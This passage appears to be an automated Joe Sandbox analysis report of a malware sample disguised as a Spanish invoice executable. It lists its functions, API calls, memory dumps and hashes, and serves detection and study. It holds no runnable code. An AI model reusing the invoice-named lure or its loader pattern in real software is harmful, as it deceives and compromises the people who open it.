                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                                  • Instruction ID: 8594309fab6a939f8579025671b20e25c27ad2f20b93bd04310bc8f9388019e2
                                                  • Opcode Fuzzy Hash: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                                  • Instruction Fuzzy Hash: A6713471E04228CBDF28CF98C844BADBBB1FF45305F14806AD816BB281D778A986DF45
                                                  Function 00406F68 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                                  • Instruction ID: 804367245b599a5d262e6525417658d62bb0317a144133a249ff79fbb491f744
                                                  • Opcode Fuzzy Hash: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                                  • Instruction Fuzzy Hash: 04712571E04228CBDF28CF98C854BADBBB1FF44305F15806AD856B7281C778A986DF45
                                                  Function 004020FD Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402128
                                                    • Part of subcall function 004055C6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                    • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                    • Part of subcall function 004055C6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00403412,00403412,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405621
                                                    • Part of subcall function 004055C6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll), ref: 00405633
                                                    • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                    • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                    • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00402139
                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004021B6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 334405425-0
                                                  • Opcode ID: 87ca4aa348f59b6215766dcf7a4b6f1fb8702d7c164a10d0237d14db202080f8
                                                  • Instruction ID: 9d10c82c24da772f465f8b6e856316e7ef0d48b300f6b25f54a31c11c95ed806
                                                  • Opcode Fuzzy Hash: 87ca4aa348f59b6215766dcf7a4b6f1fb8702d7c164a10d0237d14db202080f8
                                                  • Instruction Fuzzy Hash: F821A431904204EACF10AFA5CF49A9E7AB1BF44359F30413BF105B91E5CBBD8982DA2D
                                                  Function 00401BC0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalFree.KERNEL32(005B94B8), ref: 00401C30
                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree
                                                  • String ID: Call
                                                  • API String ID: 3394109436-1824292864
                                                  • Opcode ID: c269c497a8aebc7fea31c3561dfaa5aae95ebe96759bd4d552805187518a5ac6
                                                  • Instruction ID: b885d26f68b874ad9ff9a305e80acb85bda866dca5011e4f065ba1a91b1516cf
                                                  • Opcode Fuzzy Hash: c269c497a8aebc7fea31c3561dfaa5aae95ebe96759bd4d552805187518a5ac6
                                                  • Instruction Fuzzy Hash: 09218473904610ABD730ABA4DE85A6E72A4AB04328715053FF952B32D4C6BCE8919B5D
                                                  Function 0040254F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00000000,00000011,00000002), ref: 00402622
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID:
                                                  • API String ID: 3356406503-0
                                                  • Opcode ID: df434ad9e61f8f71b2db311f576036875c1165a0340788b8ea338e36c311122b
                                                  • Instruction ID: d59507dec88f13297dcb42e268b6e0170753ff524d958fced3891ef78adf3038
                                                  • Opcode Fuzzy Hash: df434ad9e61f8f71b2db311f576036875c1165a0340788b8ea338e36c311122b
                                                  • Instruction Fuzzy Hash: 8F118C71904216EADF15DFA0CA589AEB7B4FF04348F20443FE806B62D0D3B84A45DB9D
                                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                  • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                                  • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                  • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                                                  Function 00402459 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040247B
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402484
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CloseDeleteValue
                                                  • String ID:
                                                  • API String ID: 2831762973-0
                                                  • Opcode ID: de9e278521471a670cb8df2be2b4d8b38116ca4bc9ca7e6bf266e0e6989b2433
                                                  • Instruction ID: 8adcbc206ff712accdb54216371371453b286a19eaa2ac3ec43ed269339827cd
                                                  • Opcode Fuzzy Hash: de9e278521471a670cb8df2be2b4d8b38116ca4bc9ca7e6bf266e0e6989b2433
                                                  • Instruction Fuzzy Hash: 48F09C32A04521ABDB10BBA9DB8D5EE7265AB44354F11443FF502B71C1CAFC4D02977D
                                                  Function 00405A95 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405AD7
                                                  • GetLastError.KERNEL32 ref: 00405AE5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                  • Instruction ID: d90010de02f5ef9460f17531ca4347861228eabf88ca3652e96e8ae86f83f0cd
                                                  • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                  • Instruction Fuzzy Hash: 5FF017B1D0060EDBDF00CFA4D6487EFBBB4AF04309F00812AD941B6281D7B882488FE9
                                                  Function 00405B24 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                  • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3712363035-0
                                                  • Opcode ID: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                  • Instruction ID: 3e6b85693243cf5959e47e0a5ce0ecee53803ede082a99688cf67a66356fc275
                                                  • Opcode Fuzzy Hash: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                  • Instruction Fuzzy Hash: 3AE0BFB4A10219BFFB10AB64ED05F7B77BCF704604F418825BD10F2551D774A9148A7C
                                                  Function 00406935 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                    • Part of subcall function 004068C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                    • Part of subcall function 004068C5: wsprintfW.USER32 ref: 00406917
                                                    • Part of subcall function 004068C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                  • Instruction ID: 5f896a6f513cb693e05c26686958cbb9026995673407ad46a654cc37c4de4e39
                                                  • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                  • Instruction Fuzzy Hash: BCE0CD73604310EBD61067755D0493773E89F85B50302483EF947F2140D734DC32A7AA
                                                  Function 00406031 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,80000000,00000003), ref: 00406035
                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406057
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                  • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                  • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                  • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                  Function 00405AEF Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                  • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B03
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                  • Instruction ID: c3646108da72950d5b730f2af08982bf7448ccd78712563759f5c9f930c8cbe9
                                                  • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                  • Instruction Fuzzy Hash: 11C04C70244906DAD6509B219F0C71779A0EB50781F195839A586E50A0DA34B455D92D
                                                  Function 707E2B98 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000), ref: 707E2C57
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84226363291.00000000707E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 707E0000, based on PE: true
                                                  • Associated: 00000000.00000002.84226292605.00000000707E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.84226422708.00000000707E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.84226496862.00000000707E6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
